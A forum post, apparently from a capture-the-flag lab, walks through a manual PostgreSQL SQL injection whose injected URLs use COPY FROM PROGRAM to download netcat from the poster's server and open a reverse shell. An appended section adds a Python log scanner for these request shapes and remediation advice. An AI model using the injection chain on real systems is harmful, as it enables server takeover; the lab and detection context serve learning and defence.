Hi,
It looks like a few people had questions about how to manually perform the SQL injection. Using Floriange's methodology, I was able to get it working manually. Here is what I did:
Assumptions: you are logged into the website using admin creds.
- Stand up a simple webserver on port 80
[sudo python3 -m http.server 80]
- In the case of the server above, my server makes my desktop the root directory. So I made sure I had a copy of netcat on my desktop (I put it in a folder called bin for funsies)
- Open up netcat on port 4444 (or whatever port)
[nc -lvnp 4444]
- Following Floriange's (respect given for code) methodology, I pasted the following lines into my browser window to take advantage of the SQL injection vulnerability:
[http://10.10.10.46/dashboard.php?search=a';DROP TABLE IF EXISTS cmd_27440; -- -]
[http://10.10.10.46/dashboard.php?search=a';CREATE TABLE cmd_27440(cmd_output text); -- -]
[http://10.10.10.46/dashboard.php?search=a';COPY cmd_27440 FROM PROGRAM 'wget -P /tmp/27440 http://10.10.14.XX:80/bin/nc'; -- -]
[http://10.10.10.46/dashboard.php?search=a';COPY cmd_27440 FROM PROGRAM 'chmod 777 /tmp/27440/nc'; -- -]
[http://10.10.10.46/dashboard.php?search=a';COPY cmd_27440 FROM PROGRAM '/tmp/27440/nc 10.10.14.XX 4444 -e /bin/bash'; -- -]
note1: the XX's on some IP addresses represent my IP address.
- Check netcat - you should have a terminal. Do a test command like whoami if you'd like.
— fin —
note2: the number 27440 is a random number. I'd recommend changing it when you execute.
This challenge was a little trickier due to sqlmap not working, but I enjoyed learning how to do a manual SQL injection. If anyone is able to help me understand why sqlmap isn't working, I'd be interested to know.
Cheers,
bii
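Since the post above shows the request shapes this injection uses, here is a detection-side companion. It is an added example of mine, not code from the post, from Floriange or from the box: a small Python scanner that parses web-server access-log lines, URL-decodes each query parameter and flags values where a closing quote is followed by a statement separator and a new statement, with a separate tag for PostgreSQL `COPY ... FROM PROGRAM`. The log lines, the source IP 10.10.14.5, the timestamps and the harmless `id` command in the COPY line are all constructed; the regexes are my own heuristics, not a vendor signature.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed access-log lines (not captured from any real host). The request shapes
# mirror the stacked-query injection discussed in the thread; the COPY payload here
# runs a harmless 'id' instead of fetching anything. Some ';' are left raw on purpose.
SAMPLE_LOG = """\
10.10.14.5 - - [10/Mar/2021:12:00:01 +0000] "GET /dashboard.php?search=a HTTP/1.1" 200 512
10.10.14.5 - - [10/Mar/2021:12:00:07 +0000] "GET /dashboard.php?search=a%27;DROP%20TABLE%20IF%20EXISTS%20cmd_27440;%20--%20- HTTP/1.1" 200 512
10.10.14.5 - - [10/Mar/2021:12:00:09 +0000] "GET /dashboard.php?search=a%27;CREATE%20TABLE%20cmd_27440(cmd_output%20text);%20--%20- HTTP/1.1" 200 512
10.10.14.5 - - [10/Mar/2021:12:00:15 +0000] "GET /dashboard.php?search=a%27;COPY%20cmd_27440%20FROM%20PROGRAM%20%27id%27;%20--%20- HTTP/1.1" 200 512
10.10.14.5 - - [10/Mar/2021:12:00:20 +0000] "GET /dashboard.php?search=O%27Brien HTTP/1.1" 200 512
"""

# Common/combined log format: client ident user [timestamp] "METHOD target PROTO" status ...
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A quote closing the string literal, then a statement separator and a new statement.
STACKED_RE = re.compile(r"""['"]\s*;\s*(?:DROP|CREATE|ALTER|INSERT|UPDATE|DELETE|COPY|SELECT)\b""", re.I)
# PostgreSQL's COPY ... FROM PROGRAM executes a shell command on the database server.
COPY_PROGRAM_RE = re.compile(r"\bCOPY\b.*\bFROM\s+PROGRAM\b", re.I | re.S)


def parse_query(query):
    """Split on '&' only, so a raw ';' inside a value (the very separator we want to
    see) is kept; older urllib.parse.parse_qs also split on ';' and would hide it."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def analyze_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    for name, value in parse_query(urlsplit(m.group("target")).query):
        # Decode a second time so a double-encoded payload (%2527) is also inspected.
        decoded = unquote_plus(value)
        reasons = []
        if STACKED_RE.search(decoded):
            reasons.append("stacked-query")
        if COPY_PROGRAM_RE.search(decoded):
            reasons.append("copy-from-program")
        if reasons:
            return {"src": m.group("src"), "ts": m.group("ts"), "param": name,
                    "value": decoded, "reasons": reasons}
    return None


def scan_log(text):
    """Run analyze_line over every line of a log and collect the findings."""
    findings = []
    for line in text.splitlines():
        finding = analyze_line(line)
        if finding:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} param={f['param']} {','.join(f['reasons'])}: {f['value']}")
```

Two things make the chain in the post possible: the search string is concatenated straight into the query, and the role the app connects as is allowed to run `COPY ... FROM PROGRAM` (superuser, or membership in `pg_execute_server_program` on PostgreSQL 11 and later). A parameterized query closes the first, and an unprivileged application role closes the second, so a hit from this scanner is a prompt to check both.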